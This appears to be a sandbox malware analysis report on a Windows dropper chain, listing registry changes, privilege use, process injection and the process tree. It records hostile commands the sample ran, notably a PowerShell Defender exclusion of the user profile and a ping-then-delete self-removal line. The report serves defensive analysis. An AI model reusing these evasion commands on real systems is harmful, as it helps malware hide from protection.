\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" 9YnX9TIPmfCMcUr7DOBqr4ym.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" 9YnX9TIPmfCMcUr7DOBqr4ym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Processes:
BOWXpT9EMatm7T8qv30PJ1Fe.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 BOWXpT9EMatm7T8qv30PJ1Fe.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e BOWXpT9EMatm7T8qv30PJ1Fe.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e BOWXpT9EMatm7T8qv30PJ1Fe.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exeexplorgu.exepowershell.exepowershell.exepowershell.exeRegAsm.exerundll32.exedialer.exeu2tc.0.exepowershell.exeMWqP5e651UE727D9aFjdApYi.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exepowershell.exepowershell.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exepid process 1884 09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe 1884 09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe 904 explorgu.exe 904 explorgu.exe 3844 powershell.exe 3844 powershell.exe 132 powershell.exe 4876 powershell.exe 652 RegAsm.exe 652 RegAsm.exe 4332 rundll32.exe 4332 rundll32.exe 4332 rundll32.exe 4332 rundll32.exe 4332 rundll32.exe 4332 rundll32.exe 1532 dialer.exe 1532 dialer.exe 1532 dialer.exe 1532 dialer.exe 4876 powershell.exe 4876 powershell.exe 132 powershell.exe 132 powershell.exe 2736 u2tc.0.exe 2736 u2tc.0.exe 4332 rundll32.exe 4332 rundll32.exe 4332 rundll32.exe 4332 rundll32.exe 1016 powershell.exe 1016 powershell.exe 1016 powershell.exe 3272 MWqP5e651UE727D9aFjdApYi.exe 3272 MWqP5e651UE727D9aFjdApYi.exe 1936 9YnX9TIPmfCMcUr7DOBqr4ym.exe 1936 9YnX9TIPmfCMcUr7DOBqr4ym.exe 3356 YqnYErQDqyvWk0WfwDMsdpx4.exe 3356 YqnYErQDqyvWk0WfwDMsdpx4.exe 780 powershell.exe 780 powershell.exe 4820 powershell.exe 4820 powershell.exe 780 powershell.exe 4820 powershell.exe 3880 9YnX9TIPmfCMcUr7DOBqr4ym.exe 3880 9YnX9TIPmfCMcUr7DOBqr4ym.exe 2800 YqnYErQDqyvWk0WfwDMsdpx4.exe 2800 YqnYErQDqyvWk0WfwDMsdpx4.exe 3880 9YnX9TIPmfCMcUr7DOBqr4ym.exe 3880 9YnX9TIPmfCMcUr7DOBqr4ym.exe 2800 YqnYErQDqyvWk0WfwDMsdpx4.exe 2800 YqnYErQDqyvWk0WfwDMsdpx4.exe 3880 9YnX9TIPmfCMcUr7DOBqr4ym.exe 3880 9YnX9TIPmfCMcUr7DOBqr4ym.exe 3880 9YnX9TIPmfCMcUr7DOBqr4ym.exe 3880 9YnX9TIPmfCMcUr7DOBqr4ym.exe 3880 9YnX9TIPmfCMcUr7DOBqr4ym.exe 3880 9YnX9TIPmfCMcUr7DOBqr4ym.exe 2800 YqnYErQDqyvWk0WfwDMsdpx4.exe 2800 YqnYErQDqyvWk0WfwDMsdpx4.exe 2800 YqnYErQDqyvWk0WfwDMsdpx4.exe 2800 YqnYErQDqyvWk0WfwDMsdpx4.exe 2800 YqnYErQDqyvWk0WfwDMsdpx4.exe -
Suspicious use of AdjustPrivilegeToken 33 IoCs
Processes:
powershell.exeinstallutil.exepowershell.exepowershell.exepowershell.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeBLHU0RlzPVoO4o5n4SRKk03P.exe9Z26EcBsLLBcqwnDFb4WtGQK.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exepowershell.exepowershell.exepowershell.execsrss.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 3844 powershell.exe Token: SeDebugPrivilege 720 installutil.exe Token: SeDebugPrivilege 4876 powershell.exe Token: SeDebugPrivilege 132 powershell.exe Token: SeDebugPrivilege 1016 powershell.exe Token: SeDebugPrivilege 1936 9YnX9TIPmfCMcUr7DOBqr4ym.exe Token: SeDebugPrivilege 3356 YqnYErQDqyvWk0WfwDMsdpx4.exe Token: SeImpersonatePrivilege 1936 9YnX9TIPmfCMcUr7DOBqr4ym.exe Token: SeImpersonatePrivilege 3356 YqnYErQDqyvWk0WfwDMsdpx4.exe Token: SeDebugPrivilege 780 powershell.exe Token: SeDebugPrivilege 4820 powershell.exe Token: SeDebugPrivilege 2780 powershell.exe Token: SeDebugPrivilege 4152 powershell.exe Token: SeDebugPrivilege 404 powershell.exe Token: SeDebugPrivilege 2768 powershell.exe Token: SeDebugPrivilege 5280 powershell.exe Token: SeDebugPrivilege 5720 powershell.exe Token: SeDebugPrivilege 4952 BLHU0RlzPVoO4o5n4SRKk03P.exe Token: SeImpersonatePrivilege 4952 BLHU0RlzPVoO4o5n4SRKk03P.exe Token: SeDebugPrivilege 3168 9Z26EcBsLLBcqwnDFb4WtGQK.exe Token: SeImpersonatePrivilege 3168 9Z26EcBsLLBcqwnDFb4WtGQK.exe Token: SeDebugPrivilege 1260 powershell.exe Token: SeDebugPrivilege 5296 powershell.exe Token: SeDebugPrivilege 1092 powershell.exe Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 4540 powershell.exe Token: SeDebugPrivilege 5820 powershell.exe Token: SeDebugPrivilege 1260 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 6124 powershell.exe Token: SeDebugPrivilege 5720 powershell.exe Token: SeSystemEnvironmentPrivilege 5560 csrss.exe Token: SeDebugPrivilege 880 powershell.EXE -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
u2tc.1.exepid process 5060 u2tc.1.exe 5060 u2tc.1.exe 5060 u2tc.1.exe 5060 u2tc.1.exe 5060 u2tc.1.exe 5060 u2tc.1.exe 5060 u2tc.1.exe -
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
u2tc.1.exepid process 5060 u2tc.1.exe 5060 u2tc.1.exe 5060 u2tc.1.exe 5060 u2tc.1.exe 5060 u2tc.1.exe 5060 u2tc.1.exe 5060 u2tc.1.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
BroomSetup.exepid process 2688 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
explorgu.exefile300un.exeinstallutil.exePlu2Yra1DcZOYdQ6S0X9boNc.exePlu2Yra1DcZOYdQ6S0X9boNc.tmpRDOdP6RHoxxbbJZvBW0nzcZC.exeq9ftR3MnZJS329eRcXixlt8T.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exeRegAsm.exedescription pid process target process PID 904 wrote to memory of 4720 904 explorgu.exe file300un.exe PID 904 wrote to memory of 4720 904 explorgu.exe file300un.exe PID 4720 wrote to memory of 3844 4720 file300un.exe powershell.exe PID 4720 wrote to memory of 3844 4720 file300un.exe powershell.exe PID 4720 wrote to memory of 720 4720 file300un.exe installutil.exe PID 4720 wrote to memory of 720 4720 file300un.exe installutil.exe PID 4720 wrote to memory of 720 4720 file300un.exe installutil.exe PID 4720 wrote to memory of 720 4720 file300un.exe installutil.exe PID 4720 wrote to memory of 720 4720 file300un.exe installutil.exe PID 4720 wrote to memory of 720 4720 file300un.exe installutil.exe PID 4720 wrote to memory of 720 4720 file300un.exe installutil.exe PID 4720 wrote to memory of 720 4720 file300un.exe installutil.exe PID 720 wrote to memory of 3648 720 installutil.exe q9ftR3MnZJS329eRcXixlt8T.exe PID 720 wrote to memory of 3648 720 installutil.exe q9ftR3MnZJS329eRcXixlt8T.exe PID 720 wrote to memory of 3648 720 installutil.exe q9ftR3MnZJS329eRcXixlt8T.exe PID 720 wrote to memory of 3324 720 installutil.exe Plu2Yra1DcZOYdQ6S0X9boNc.exe PID 720 wrote to memory of 3324 720 installutil.exe Plu2Yra1DcZOYdQ6S0X9boNc.exe PID 720 wrote to memory of 3324 720 installutil.exe Plu2Yra1DcZOYdQ6S0X9boNc.exe PID 3324 wrote to memory of 3256 3324 Plu2Yra1DcZOYdQ6S0X9boNc.exe Plu2Yra1DcZOYdQ6S0X9boNc.tmp PID 3324 wrote to memory of 3256 3324 Plu2Yra1DcZOYdQ6S0X9boNc.exe Plu2Yra1DcZOYdQ6S0X9boNc.tmp PID 3324 wrote to memory of 3256 3324 Plu2Yra1DcZOYdQ6S0X9boNc.exe Plu2Yra1DcZOYdQ6S0X9boNc.tmp PID 3256 wrote to memory of 1556 3256 Plu2Yra1DcZOYdQ6S0X9boNc.tmp seniorflashdecompiler.exe PID 3256 wrote to memory of 1556 3256 Plu2Yra1DcZOYdQ6S0X9boNc.tmp seniorflashdecompiler.exe PID 3256 wrote to memory of 1556 3256 Plu2Yra1DcZOYdQ6S0X9boNc.tmp seniorflashdecompiler.exe PID 3256 wrote to memory of 3976 3256 Plu2Yra1DcZOYdQ6S0X9boNc.tmp seniorflashdecompiler.exe PID 3256 wrote to memory of 3976 3256 Plu2Yra1DcZOYdQ6S0X9boNc.tmp seniorflashdecompiler.exe PID 3256 wrote to memory of 3976 3256 Plu2Yra1DcZOYdQ6S0X9boNc.tmp seniorflashdecompiler.exe PID 720 wrote to memory of 1844 720 installutil.exe RDOdP6RHoxxbbJZvBW0nzcZC.exe PID 720 wrote to memory of 1844 720 installutil.exe RDOdP6RHoxxbbJZvBW0nzcZC.exe PID 720 wrote to memory of 1844 720 installutil.exe RDOdP6RHoxxbbJZvBW0nzcZC.exe PID 1844 wrote to memory of 652 1844 RDOdP6RHoxxbbJZvBW0nzcZC.exe RegAsm.exe PID 1844 wrote to memory of 652 1844 RDOdP6RHoxxbbJZvBW0nzcZC.exe RegAsm.exe PID 1844 wrote to memory of 652 1844 RDOdP6RHoxxbbJZvBW0nzcZC.exe RegAsm.exe PID 1844 wrote to memory of 652 1844 RDOdP6RHoxxbbJZvBW0nzcZC.exe RegAsm.exe PID 1844 wrote to memory of 652 1844 RDOdP6RHoxxbbJZvBW0nzcZC.exe RegAsm.exe PID 1844 wrote to memory of 652 1844 RDOdP6RHoxxbbJZvBW0nzcZC.exe RegAsm.exe PID 1844 wrote to memory of 652 1844 RDOdP6RHoxxbbJZvBW0nzcZC.exe RegAsm.exe PID 1844 wrote to memory of 652 1844 RDOdP6RHoxxbbJZvBW0nzcZC.exe RegAsm.exe PID 1844 wrote to memory of 652 1844 RDOdP6RHoxxbbJZvBW0nzcZC.exe RegAsm.exe PID 1844 wrote to memory of 652 1844 RDOdP6RHoxxbbJZvBW0nzcZC.exe RegAsm.exe PID 1844 wrote to memory of 652 1844 RDOdP6RHoxxbbJZvBW0nzcZC.exe RegAsm.exe PID 720 wrote to memory of 1936 720 installutil.exe 9YnX9TIPmfCMcUr7DOBqr4ym.exe PID 720 wrote to memory of 1936 720 installutil.exe 9YnX9TIPmfCMcUr7DOBqr4ym.exe PID 720 wrote to memory of 1936 720 installutil.exe 9YnX9TIPmfCMcUr7DOBqr4ym.exe PID 720 wrote to memory of 3356 720 installutil.exe YqnYErQDqyvWk0WfwDMsdpx4.exe PID 720 wrote to memory of 3356 720 installutil.exe YqnYErQDqyvWk0WfwDMsdpx4.exe PID 720 wrote to memory of 3356 720 installutil.exe YqnYErQDqyvWk0WfwDMsdpx4.exe PID 3648 wrote to memory of 2736 3648 q9ftR3MnZJS329eRcXixlt8T.exe u2tc.0.exe PID 3648 wrote to memory of 2736 3648 q9ftR3MnZJS329eRcXixlt8T.exe u2tc.0.exe PID 3648 wrote to memory of 2736 3648 q9ftR3MnZJS329eRcXixlt8T.exe u2tc.0.exe PID 1936 wrote to memory of 132 1936 9YnX9TIPmfCMcUr7DOBqr4ym.exe powershell.exe PID 1936 wrote to memory of 132 1936 9YnX9TIPmfCMcUr7DOBqr4ym.exe powershell.exe PID 1936 wrote to memory of 132 1936 9YnX9TIPmfCMcUr7DOBqr4ym.exe powershell.exe PID 3356 wrote to memory of 4876 3356 YqnYErQDqyvWk0WfwDMsdpx4.exe powershell.exe PID 3356 wrote to memory of 4876 3356 YqnYErQDqyvWk0WfwDMsdpx4.exe powershell.exe PID 3356 wrote to memory of 4876 3356 YqnYErQDqyvWk0WfwDMsdpx4.exe powershell.exe PID 652 wrote to memory of 1532 652 RegAsm.exe dialer.exe PID 652 wrote to memory of 1532 652 RegAsm.exe dialer.exe PID 652 wrote to memory of 1532 652 RegAsm.exe dialer.exe PID 652 wrote to memory of 1532 652 RegAsm.exe dialer.exe PID 652 wrote to memory of 1532 652 RegAsm.exe dialer.exe PID 904 wrote to memory of 4048 904 explorgu.exe rundll32.exe PID 904 wrote to memory of 4048 904 explorgu.exe rundll32.exe PID 904 wrote to memory of 4048 904 explorgu.exe rundll32.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2832
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1532
-
-
C:\Users\Admin\AppData\Local\Temp\09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe"C:\Users\Admin\AppData\Local\Temp\09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1884
-
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Users\Admin\AppData\Local\Temp\1001000001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1001000001\file300un.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3844
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"3⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Users\Admin\Pictures\q9ftR3MnZJS329eRcXixlt8T.exe"C:\Users\Admin\Pictures\q9ftR3MnZJS329eRcXixlt8T.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Users\Admin\AppData\Local\Temp\u2tc.0.exe"C:\Users\Admin\AppData\Local\Temp\u2tc.0.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2736 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\ECGDHDHJEB.exe"6⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\ECGDHDHJEB.exe"C:\Users\Admin\AppData\Local\Temp\ECGDHDHJEB.exe"7⤵PID:6120
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\ECGDHDHJEB.exe8⤵PID:5420
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30009⤵
- Runs ping.exe
PID:5172
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 28486⤵
- Program crash
PID:4876
-
-
-
C:\Users\Admin\AppData\Local\Temp\u2tc.1.exe"C:\Users\Admin\AppData\Local\Temp\u2tc.1.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5060 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD16⤵
- Suspicious use of AdjustPrivilegeToken
PID:1260
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 11685⤵
- Program crash
PID:5040
-
-
-
C:\Users\Admin\Pictures\Plu2Yra1DcZOYdQ6S0X9boNc.exe"C:\Users\Admin\Pictures\Plu2Yra1DcZOYdQ6S0X9boNc.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Users\Admin\AppData\Local\Temp\is-J1LL2.tmp\Plu2Yra1DcZOYdQ6S0X9boNc.tmp"C:\Users\Admin\AppData\Local\Temp\is-J1LL2.tmp\Plu2Yra1DcZOYdQ6S0X9boNc.tmp" /SL5="$80178,1402811,54272,C:\Users\Admin\Pictures\Plu2Yra1DcZOYdQ6S0X9boNc.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Users\Admin\AppData\Local\Senior Flash Decompiler\seniorflashdecompiler.exe"C:\Users\Admin\AppData\Local\Senior Flash Decompiler\seniorflashdecompiler.exe" -i6⤵
- Executes dropped EXE
PID:1556
-
-
C:\Users\Admin\AppData\Local\Senior Flash Decompiler\seniorflashdecompiler.exe"C:\Users\Admin\AppData\Local\Senior Flash Decompiler\seniorflashdecompiler.exe" -s6⤵
- Executes dropped EXE
PID:3976
-
-
-
-
C:\Users\Admin\Pictures\RDOdP6RHoxxbbJZvBW0nzcZC.exe"C:\Users\Admin\Pictures\RDOdP6RHoxxbbJZvBW0nzcZC.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
